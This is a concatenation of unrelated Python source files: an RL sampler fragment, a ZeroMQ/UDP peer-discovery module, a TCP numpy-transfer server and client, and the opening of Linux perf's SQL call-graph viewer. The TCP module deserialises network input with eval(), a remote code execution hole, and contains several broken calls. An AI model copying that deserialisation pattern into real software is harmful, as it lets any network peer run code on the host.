Assigns hardware affinity, and then forks parallel worker processes
and moves agent model to device. Then enters infinite loop: waits for
signals from main sampler process to collect training samples or
perform evaluation, and then serves actions during collection. At
every loop, calls agent to retrieve new parameter values from the
training process, which are communicated through shared CPU memory.
"""
self.rank = rank
p = psutil.Process()
if affinity.get("set_affinity", True):
p.cpu_affinity(affinity["master_cpus"])
# torch.set_num_threads(affinity["master_torch_threads"])
torch.set_num_threads(1) # Possibly needed to avoid MKL hang.
self.launch_workers(double_buffer_slice, affinity, seed, n_envs_list)
self.agent.to_device(cuda_idx=affinity["cuda_idx"])
self.agent.collector_initialize(
global_B=self.batch_spec.B, env_ranks=env_ranks # Not updated.
) # For vector eps-greedy.
self.ctrl.barrier_out.wait() # Wait for workers to decorrelate envs.
while True:
self.sync.stop_eval.value = False # Reset.
self.ctrl.barrier_in.wait()
if self.ctrl.quit.value:
break
self.agent.recv_shared_memory()
if self.ctrl.do_eval.value:
self.agent.eval_mode(self.ctrl.itr.value)
self.serve_actions_evaluation(self.ctrl.itr.value)
else:
self.agent.sample_mode(self.ctrl.itr.value)
# Only for bootstrap_value:
self.samples_np = self.double_buffer[self.ctrl.db_idx.value]
if hasattr(self, "double_bootstrap_value_pair"): # Alternating sampler.
self.bootstrap_value_pair = self.double_bootstrap_value_pair[
self.ctrl.db_idx.value
]
self.serve_actions(self.ctrl.itr.value)
self.ctrl.barrier_out.wait()
self.shutdown_workers()
def launch_workers(self, double_buffer_slice, affinity, seed, n_envs_list):
self.n_worker = n_worker = len(n_envs_list)
# A little slight-of-hand to make 2-level signal:
self.ctrl.stop_eval = self.sync.stop_eval
self.sync = AttrDict(
obs_ready=[mp.Semaphore(0) for _ in range(n_worker)],
act_ready=[mp.Semaphore(0) for _ in range(n_worker)],
stop_eval=mp.RawValue(ctypes.c_bool, False), # Overwrite.
# stop_eval=self.ctrl.stop_eval, # No, make 2-level signal.
db_idx=self.ctrl.db_idx, # Copy into sync which passes to Collector.
)
self.step_buffer_pyt, self.step_buffer_np = build_step_buffer(
self.examples, sum(n_envs_list)
)
self.agent_inputs = AgentInputs(
self.step_buffer_pyt.observation,
self.step_buffer_pyt.action,
self.step_buffer_pyt.reward,
)
if self.eval_n_envs > 0:
eval_n_envs = self.eval_n_envs_per * n_worker
eval_step_buffer_pyt, eval_step_buffer_np = build_step_buffer(
self.examples, eval_n_envs
)
self.eval_step_buffer_pyt = eval_step_buffer_pyt
self.eval_step_buffer_np = eval_step_buffer_np
self.eval_agent_inputs = AgentInputs(
self.eval_step_buffer_pyt.observation,
self.eval_step_buffer_pyt.action,
self.eval_step_buffer_pyt.reward,
)
# eval_max_T already made in earlier initialize.
self.double_buffer = double_buffer_slice # Now only see my part.
common_kwargs = self._assemble_common_kwargs(affinity)
common_kwargs["agent"] = None # Remove.
workers_kwargs = self._assemble_workers_kwargs(affinity, seed, n_envs_list)
# Yes, fork again.
self.workers = [
mp.Process(
target=sampling_process,
kwargs=dict(common_kwargs=common_kwargs, worker_kwargs=w_kwargs),
)
for w_kwargs in workers_kwargs
]
for w in self.workers:
w.start()
def shutdown_workers(self):
for w in self.workers:
w.join() # Already signaled to quit by central master.
def _assemble_workers_kwargs(self, affinity, seed, n_envs_list):
workers_kwargs = super()._assemble_workers_kwargs(affinity, seed, n_envs_list)
i_env = 0
for rank, w_kwargs in enumerate(workers_kwargs):
n_envs = n_envs_list[rank]
slice_B = slice(i_env, i_env + n_envs)
w_kwargs["sync"] = AttrDict(
stop_eval=self.sync.stop_eval,
obs_ready=self.sync.obs_ready[rank],
act_ready=self.sync.act_ready[rank],
db_idx=self.sync.db_idx,
)
w_kwargs["step_buffer_np"] = self.step_buffer_np[slice_B]
if self.eval_n_envs > 0:
eval_slice_B = slice(
self.eval_n_envs_per * rank, self.eval_n_envs_per * (rank + 1)
)
w_kwargs["eval_step_buffer_np"] = self.eval_step_buffer_np[eval_slice_B]
i_env += n_envs
return workers_kwargs
class AsyncGpuSampler(AsyncActionServer, AsyncGpuSamplerBase):
pass
|
discovery.py
|
'''
discovery.py
ancilla
Created by Kevin Musselman (kevin@frenzylabs.com) on 01/14/20
Copyright 2019 FrenzyLabs, LLC.
'''
import time
import uuid
from threading import Thread
import threading
import zmq
# from zmq.eventloop.ioloop import PeriodicCallback
from zmq.eventloop.zmqstream import ZMQStream
from tornado.ioloop import IOLoop, PeriodicCallback
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
import json
import socket
import netifaces
from functools import partial
from .udp import UDP
from ...utils.service_json_encoder import ServiceJsonEncoder
from ..response import AncillaError
from ...data.models import Node
from .beacon import Beacon
# =====================================================================
# Synchronous part, works in our application thread
def pipe(ctx):
"""create an inproc PAIR pipe"""
a = ctx.socket(zmq.PAIR)
b = ctx.socket(zmq.PAIR)
url = "inproc://%s" % uuid.uuid1()
a.bind(url)
b.connect(url)
return a, b
class Discovery(object):
"""Interface class.
Just starts a UDP ping agent in a background thread."""
ctx = None # Our context
pipe = None # Pipe through to agent
requestpipe = None
beacon = None
agent_thread = None
agent = None
networkcb = None
nodecb = None
# current_address = None
broadcast = None
def __init__(self, node):
self._current_address = None
self.cached_peers = []
self.node = node
self.update_beacon_timeout = None
self.current_address, self.broadcast = self.check_interface_addresses()
self.beacon = Beacon(self.node.name, port=self.node.api_port, address=self.current_address)
# self.beacon.address = self.current_address
self.networkcb = PeriodicCallback(self.check_network, PING_INTERVAL * 2000, 0.2)
self.nodecb = PeriodicCallback(self.check_nodes, PING_INTERVAL * 4000, 0.1)
self.run(self.node.settings.discovery)
@property
def current_address(self):
if not self._current_address:
return '127.0.0.1'
else:
return self._current_address
@current_address.setter
def current_address(self, val):
self._current_address = val
def run(self, val):
if val:
self.start()
else:
self.stop()
def stop(self):
print(f"Stop Discovery", flush=True)
self.stop_checking()
self.networkcb.stop()
if self.update_beacon_timeout:
self.update_beacon_timeout.cancel()
self.cached_peers = []
if self.beacon:
self.beacon.close()
print(f"Closed Beacon", flush=True)
if self.pipe:
self.pipe.close()
if self.requestpipe:
self.requestpipe.close()
if self.agent:
self.agent.stop()
self.agent = None
print(f"Closed Agent", flush=True)
if self.ctx:
self.ctx.destroy()
def start(self):
print(f"Start Discovery here", flush=True)
self.beacon.run()
if self.node.settings.discoverable == True:
self.make_discoverable(True)
# if not (self.agent_thread and self.agent_thread.is_alive()):
if not self.agent or not self.agent_thread.is_alive():
self.ctx = zmq.Context()
p0, p1 = pipe(self.ctx)
p2, p3 = pipe(self.ctx)
self.agent = DiscoveryAgent(self.ctx, self.node, p1, p3)
self.agent.udp.broadcast = self.broadcast
self.agent_thread = Thread(target=self.agent.start, daemon=True)
self.agent_thread.start()
self.pipe = p0
self.requestpipe = p2
self.nodecb.start()
self.networkcb.start()
def update_port(self, port):
if self.beacon.port != port:
self.beacon.port = port
if self.node.settings.discoverable == True:
self.beacon.update()
def update_name(self, name):
self.beacon.update_name(name)
if self.node.settings.discoverable == True:
self.beacon.update()
def make_discoverable(self, val):
# print(f"Make discoverable: {val}",flush=True)
if val:
self.beacon.register()
else:
self.beacon.unregister()
def send(self, evt):
self.pipe.send_multipart(evt)
def recv(self):
"""receive a message from our interface"""
return self.pipe.recv_multipart()
def nodes(self):
if self.node.settings.discovery == True:
return self.cached_peers
else:
return []
# return [{"uuid": self.node.model.uuid, "name": self.node.name, "ip": self.beacon.local_ip}]
# return [self.node.model.to_json(only = [Node.uuid, Node.name])]
def request(self, msg):
if not self.requestpipe:
raise AncillaError(400, {"error": "Discovery is not running"})
self.requestpipe.send_multipart(msg)
reply = self.requestpipe.recv_multipart()
kind, msg = reply
return msg.decode('utf-8')
def stop_checking(self):
self.nodecb.stop()
msg = [self.node.identity + b'.notifications.nodes_changed', b'check', b'{"nodes":"check"}']
if hasattr(self.node, 'publisher'):
self.node.publisher.send_multipart(msg)
def check_nodes(self):
res = self.request([b'peers'])
new_peers = json.loads(res)
if self.cached_peers != new_peers:
self.cached_peers = new_peers
msg = [self.node.identity + b'.notifications.nodes_changed', b'check', b'{"nodes":"check"}']
self.node.publisher.send_multipart(msg)
def check_interface_addresses(self):
## uap0 interface is used by our wifi docker container to be used as a wifi access point (allow incoming connections)
## wlan0 interface is used as the client to connect to outside wifi
accesspointinterface = 'uap0'
gws = netifaces.gateways()
interfaces = netifaces.interfaces()
# list(filter(lambda x: netifaces.AF_INET in netifaces.ifaddresses(x), interfaces))
default_interface = None
address = None
broadcast = None
used_interface = ''
# if netifaces.AF_INET in gws['default']:
i = gws['default'].get(netifaces.AF_INET) or ()
if len(i) > 1:
default_interface = i[1]
if default_interface:
netaddress = netifaces.ifaddresses(default_interface).get(netifaces.AF_INET) or []
if len(netaddress) > 0:
addrdict = (netaddress[0] or {})
addr = addrdict.get('addr')
if addr and not addr.startswith('127'):
used_interface = f'DefaultGateway {default_interface}'
address = addr
if addrdict.get('broadcast'):
broadcast = addrdict.get('broadcast')
docker_address = None
if not address:
for face in interfaces:
addrs = (netifaces.ifaddresses(face).get(netifaces.AF_INET) or [])
for addrdict in addrs:
addr = addrdict.get('addr')
if not address and addr and not addr.startswith('127'):
if face.startswith('docker'):
docker_address = addr
else:
used_interface = face
address = addr
if addrdict.get('broadcast'):
broadcast = addrdict.get('broadcast')
if not address:
try:
used_interface = 'sockethostname'
address = socket.gethostbyname_ex(socket.gethostname())[-1][0]
except Exception as e:
print(f"NoAddress {str(e)}")
address = '127.0.0.1'
# print(f"Face: {used_interface} curadd= {self.current_address} address = {address}, currentbroad: {self.broadcast} bcast= {broadcast}", flush=True)
return address, broadcast
def check_network(self):
# print(f"CHECK NETWORK {threading.currentThread()}", flush=True)
adr, bcast = self.check_interface_addresses()
self.broadcast = bcast or '255.255.255.255'
if self.agent and self.agent.udp.broadcast != self.broadcast:
print(f"broadcast change: bcast udp: {self.agent.udp.broadcast} to: {self.broadcast}", flush=True)
self.agent.udp.broadcast = self.broadcast
if self.current_address != adr or (self.beacon and self.beacon.address != adr):
self.current_address = adr
if self.beacon:
self.beacon.close()
self.beacon = None
self._update_timeout = time.time() + 3.0
if self.update_beacon_timeout:
self.update_beacon_timeout.cancel()
self.update_beacon_timeout = IOLoop.current().add_timeout(self._update_timeout, partial(self.update_beacon, adr))
def update_beacon(self, adr):
try:
print(f'Updating Beacon {self.current_address}, New: {adr}')
self.beacon = Beacon(self.node.name, port=self.node.api_port, address=adr)
self.beacon.update_network(self.node.settings.discovery, self.node.settings.discoverable)
self.current_address = adr
except Exception as e:
print(f'BeaconUpdate Exception: {str(e)}')
# =====================================================================
# Asynchronous part, works in the background
PING_PORT_NUMBER = 9999
PING_INTERVAL = 1.0 # Once every 2 seconds
PEER_EXPIRY = 11.0 # 11 seconds and it's gone
UUID_BYTES = 32
class Peer(object):
uuid = None
name = None
ip = None
expires_at = None
def __init__(self, agent, uuid, name, ip, port):
self.agent = agent
self.uuid = uuid
self.name = name
self.ip = ip
self.port = port
self.is_alive()
# self.ctx = zmq.Context()
# self.setup_dealer()
def setup_dealer(self):
peer = self.ctx.socket(zmq.DEALER) # DEALER
target_identity = self.uuid.encode('ascii')
peer.setsockopt(zmq.IDENTITY, self.agent.uuid.encode('ascii'))
connect_address = f'tcp://{self.ip}:{self.port}'
print(f'Peer Connect Address = {connect_address}')
self.peer = ZMQStream(peer)
self.peer.connect(connect_address)
self.peer.on_send(self.peer_message)
self.peer.send_multipart([target_identity, b"state", b'blah'])
self.peer.send_multipart([target_identity, b"ICANHAZ?", b'tada'])
def is_alive(self, *args):
"""Reset the peers expiry time
Call this method whenever we get any activity from a peer.
"""
if len(args) > 0:
uuid, name, port, ip, *rest = args
self.name = name
self.ip = ip
self.expires_at = time.time() + PEER_EXPIRY
def peer_message(self, msg, other):
print(f'Receieved Peer Message', flush=True)
def to_json(self):
return {"uuid": self.uuid, "name": self.name, "ip": self.ip}
class DiscoveryAgent(object):
"""This structure holds the context for our agent so we can
pass that around cleanly to methods that need it
"""
ctx = None # ZMQ context
pipe = None # Pipe back to application
udp = None # UDP object
uuid = None # Our UUID as binary blob
peers = None # Hash of known peers, fast lookup
def __init__(self, ctx, node, pipe, request, loop=None):
self.ctx = ctx
self.node = node
self.pipe = pipe
self.request = request
self.loop = loop
# self.udp = udp
self.udp = UDP(PING_PORT_NUMBER)
# self.uuid = uuid.uuid4().hex.encode('utf8')
self.uuid = self.node.model.uuid # uuid.uuid4().hex
self.peers = {}
def stop(self):
self.stream.close()
if self.reappc:
self.reappc.stop()
if self.pingpc:
self.pingpc.stop()
self.udp.close()
self.udp = None
self.loop.stop()
def __del__(self):
try:
self.stop()
except:
pass
def start(self):
# asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
if self.loop is None:
if not IOLoop.current(instance=False):
self.loop = IOLoop()
else:
self.loop = IOLoop.current()
loop = self.loop
loop.add_handler(self.udp.handle.fileno(), self.handle_beacon, loop.READ)
self.stream = ZMQStream(self.request, loop)
self.stream.on_recv(self.control_message)
self.pingpc = PeriodicCallback(self.send_ping, PING_INTERVAL * 4000, 0.1)
self.pingpc.start()
self.reappc = PeriodicCallback(self.reap_peers, PING_INTERVAL * 5000, 0.1)
self.reappc.start()
loop.start()
def send_ping(self, *a, **kw):
# print(f'Send Ping here ', flush=True)
if not self.node.settings.discoverable:
return
try:
packet = json.dumps([self.uuid, self.node.name, self.node.router_port]).encode('utf-8')
self.udp.send(packet)
except Exception as e:
print(f'Ping Exception = {str(e)}')
def control_message(self, event):
"""Here we handle the different control messages from the frontend."""
action, *res = event
if action == b'peers':
p = [p.to_json() for p in self.peers.values()]
t = [b'peers', json.dumps(p, cls=ServiceJsonEncoder).encode('utf-8')]
self.request.send_multipart(t)
else:
print("control message: %s"%event)
def handle_beacon(self, fd, event):
# uuid = self.udp.recv(UUID_BYTES)
packet, ip = self.udp.recv(128)
pack = packet.decode('utf-8')
try:
res = json.loads(pack)
uuid = res[0]
name = res[1]
port = res[2]
if uuid in self.peers:
# print(f'Beacon: {res}')
self.peers[uuid].is_alive(*res, ip)
else:
# if uuid == self.uuid:
# print(f'Same Node')
# return
print("Found peer %s, %s, %s" % (uuid, name, ip))
self.peers[uuid] = Peer(self, uuid, name, ip, port)
self.pipe.send_multipart([b'JOINED', uuid.encode('utf-8')])
except Exception as e:
print(f'handle beacon exception = {str(e)}')
def reap_peers(self):
now = time.time()
for peer in list(self.peers.values()):
if peer.expires_at < now:
print("reaping %s" % peer.uuid, peer.expires_at, now)
self.peers.pop(peer.uuid)
self.pipe.send_multipart([b'LEFT', peer.uuid.encode('utf-8')])
|
base_tcp.py
|
import socket, threading
import numpy as np
import time
from ..import_basic_utils import *
from .base import BasObj
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def send_result(s, inf):
s.send(inf.encode())
def byte2dict(byteData):
byte_dict = eval(byteData.decode())
data_dict = dict()
for key in byte_dict:
item = byte_dict[key]
data = item['data']
if item['is_array']: data = np.fromstring(data, dtype=item['dtype']).reshape(item['shape'])
data_dict.update({key: data})
return data_dict
def dict2byte(data_dict):
out_dict = dict()
for key in data_dict:
value = data_dict[key]
is_array = isinstance(value, np.ndarray)
shape, dtype = None, None
if is_array:
shape, dtype = value.shape, value.dtype.name
value = value.tostring()
out_dict.update({key: {'is_array': is_array, 'shape': shape, 'dtype':dtype, 'data':value}})
return str(out_dict).encode()
def ndarray2byteDict(mat):
return {'size': mat.shape, 'dtype': mat.dtype.name, 'bytes': mat.tostring()}
def byteDict2mat(byteDict):
return np.fromstring(byteDict['bytes'], dtype=byteDict['dtype']).reshape(byteDict['size'])
class ServerThread():
def __init__(self, host='localhost', port=8888):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((host, port))
def listen(self):
print('{} listening a connection'.format('+'*10))
self.sock.listen(1)
while True:
self.client, self.address = self.sock.accept()
self.client.settimeout(1200) # time out after 20 mins
threading.Thread(target = self.listenToClient).start()
def listenToClient(self):
while True:
try:
print('{} waiting data'.format('+'*10))
self.length = recvall(self.client, 16)
if self.length is None:
raise ('Client disconnected')
else:
print('{} Connected to {}'.format('+'*10,self.address))
byteData = self.receive_data()
self.data = byte2dict(byteData=byteData)
print('{} Data received'.format('+'*10))
rets = self.process_received_data()
print('{} Data processed'.format('+'*10))
self.send_return(rets)
print('{} Return sent'.format('+'*10))
time.sleep(2)
ProcUtils().clscr()
except:
self.client.close()
return False
def receive_data(self):
byteData = recvall(self.client, int(self.length))
return byteData
# return self.get_data(byteData=byteData)
def process_received_data(self):
return self.data
def send_return(self, rets):
byteRets= dict2byte(data_dict=rets)
byteLen = str(len(byteRets)).rjust(16, '0').encode()
self.client.sendall(byteLen + byteRets)
class ClientThread():
def __init__(self, host='localhost', port=8888):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.host = host
self.port = port
self.server_connected = False
def send_and_get_return(self, aDict):
""" send a dict to sever"""
while True:
try:
if not self.server_connected:
print('{} Connecting to server: {}'.format('+'*10,self.host))
self.sock.connect((self.host, self.port))
print('Connected ....')
self.server_connected = True
self.send_dict(aDict=aDict)
return self.get_return()
except:
self.sock.close()
print('socket closed ...')
return None
def send_dict(self, aDict):
print('{} Sending byte data'.format('+' * 10))
byteData = dict2byte(data_dict=aDict)
len_byte = str(len(byteData)).rjust(16, '0').encode()
self.sock.send(len_byte + byteData)
print('Byte data sent...')
def get_return(self):
print('{} Waiting for return'.format('+' * 10))
ret_len = recvall(self.sock, 16)
byteData = recvall(self.sock, int(ret_len))
print('Return received ...')
return byte2dict(byteData=byteData)
class DectectTcpServer():
def __init__(self, args=None, cfg_path=None, detector=None, detector_reload=None):
if cfg_path is not None: args = CFG(cfg_path=cfg_path)
self.args = args
self.detector = detector
self.detector_reload = detector_reload
def predict(self, inputs):
return self.detector(inputs)
def run(self):
server = ServerThread(host='', port=self.args.port, detector=self.predict, detector_reload=self.detector_reload)
server.listen()
class DetectTcpClient():
def predict(self, inputs, filename='unnamed'):
for name in inputs:
if not isinstance(inputs[name], np.ndarray):continue
inputs[name] = ndarray2bytes(inputs[name])
inputs.update({'args': str(self.args.todict())})
byteData = str(inputs).encode()
byteRets = ClientThread(self.args.host, self.args.port).sendMessage(byteData)
# rets = pickle.loads(byteRets)
if byteRets is None: return None
rets = eval(byteRets.decode())
if not (rets, (list, tuple)): rets = [rets]
for i in range(len(rets)):
ret = rets[i]
for name in ret:
if not isinstance(ret[name], bytes): continue
rets[i][name] = bytes2ndarray(ret[name])
return rets
def run(self):
server = ServerThread(host='', port=self.args['port'], detector=self.predict)
server.listen()
def ndarray2bytes(mat):
info = mat.dtype.name
for s in mat.shape:
info+= '_' + str(s)
info = info.ljust(32, '$')
return info.encode() + mat.tostring()
def bytes2ndarray(byteData):
info = byteData[:32].decode()
info = info[:info.find('$')]
info = tuple(el for el in info.split('_'))
shape = tuple(int(el) for el in info[1:])
data_type = info[0]
return np.fromstring(byteData[32:], dtype=data_type).reshape(shape)
if __name__=='__main__':
pass
|
exported-sql-viewer.py
|
#!/usr/bin/env python2
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
# Call Graph: pt_example
# Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
# v- ls
# v- 2638:2638
# v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
# |- unknown unknown 1 13198 0.1 1 0.0
# >- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
# >- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
# v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
# >- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
# >- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
# >- __libc_csu_init ls 1 10354 0.1 10 0.0
# |- _setjmp libc-2.19.so 1 0 0.0 4 0.0
# v- main ls 1 8182043 99.6 180254 99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also a "All branches" report, which displays branches and
# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtSql import *
pyside_version_1 = True
from decimal import *
from ctypes import *
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
xrange
except NameError:
xrange = range
def printerr(*args, **keyword_args):
print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
if ip < 0:
ip += 1 << 64
return "%x" % ip
def offstr(offset):
if offset:
return "+0x%x" % offset
return ""
def dsoname(name):
if name == "[kernel.kallsyms]":
return "[kernel]"
return name
def findnth(s, sub, n, offs=0):
pos = s.find(sub)
if pos < 0:
return pos
if n <= 1:
return offs + pos
return findnth(s[pos + 1:], sub, n - 1, offs + pos + 1)
# Percent to one decimal place
def PercentToOneDP(n, d):
if not d:
return "0.0"
x = (n * Decimal(100)) / d
return str(x.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
# Helper for queries that must not fail
def QueryExec(query, stmt):
ret = query.exec_(stmt)
if not ret:
raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
done = Signal(object)
def __init__(self, task, param=None, parent=None):
super(Thread, self).__init__(parent)
self.task = task
self.param = param
def run(self):
while True:
if self.param is None:
done, result = self.task()
else:
done, result = self.task(self.param)
self.done.emit(result)
if done:
break
# Tree data model
class TreeModel(QAbstractItemModel):
def __init__(self, glb, parent=None):
super(TreeModel, self).__init__(parent)
self.glb = glb
self.root = self.GetRoot()
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self.root
def rowCount(self, parent):
result = self.Item(parent).childCount()
if result < 0:
result = 0
self.dataChanged.emit(parent, parent)
return result
def hasChildren(self, parent):
return self.Item(parent).hasChildren()
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def parent(self, child):
child_item = child.internalPointer()
if child_item is self.root:
return QModelIndex()
parent_item = child_item.getParentItem()
return self.createIndex(parent_item.getRow(), 0, parent_item)
def index(self, row, column, parent):
child_item = self.Item(parent).getChildItem(row)
return self.createIndex(row, column, child_item)
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.root.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
def __init__(self, parent=None):
super(TableModel, self).__init__(parent)
self.child_count = 0
self.child_items = []
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Model cache
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()
def LookupCreateModel(model_name, create_fn):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
if model is None:
model = create_fn()
model_cache[model_name] = model
model_cache_lock.release()
return model
# Find bar
class FindBar():
def __init__(self, parent, finder, is_reg_expr=False):
self.finder = finder
self.context = []
self.last_value = None
self.last_pattern = None
label = QLabel("Find:")
label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.textbox = QComboBox()
self.textbox.setEditable(True)
self.textbox.currentIndexChanged.connect(self.ValueChanged)
self.progress = QProgressBar()
self.progress.setRange(0, 0)
self.progress.hide()
if is_reg_expr:
self.pattern = QCheckBox("Regular Expression")
else:
self.pattern = QCheckBox("Pattern")
self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.next_button = QToolButton()
self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
self.next_button.released.connect(lambda: self.NextPrev(1))
self.prev_button = QToolButton()
self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
self.prev_button.released.connect(lambda: self.NextPrev(-1))
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(label)
self.hbox.addWidget(self.textbox)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.pattern)
self.hbox.addWidget(self.next_button)
self.hbox.addWidget(self.prev_button)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox);
self.bar.hide()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.textbox.setFocus()
def Deactivate(self):
self.bar.hide()
def Busy(self):
self.textbox.setEnabled(False)
self.pattern.hide()
self.next_button.hide()
self.prev_button.hide()
self.progress.show()
def Idle(self):
self.textbox.setEnabled(True)
self.progress.hide()
self.pattern.show()
self.next_button.show()
self.prev_button.show()
def Find(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
self.last_value = value
self.last_pattern = pattern
self.finder.Find(value, direction, pattern, self.context)
def ValueChanged(self):
value = self.textbox.currentText()
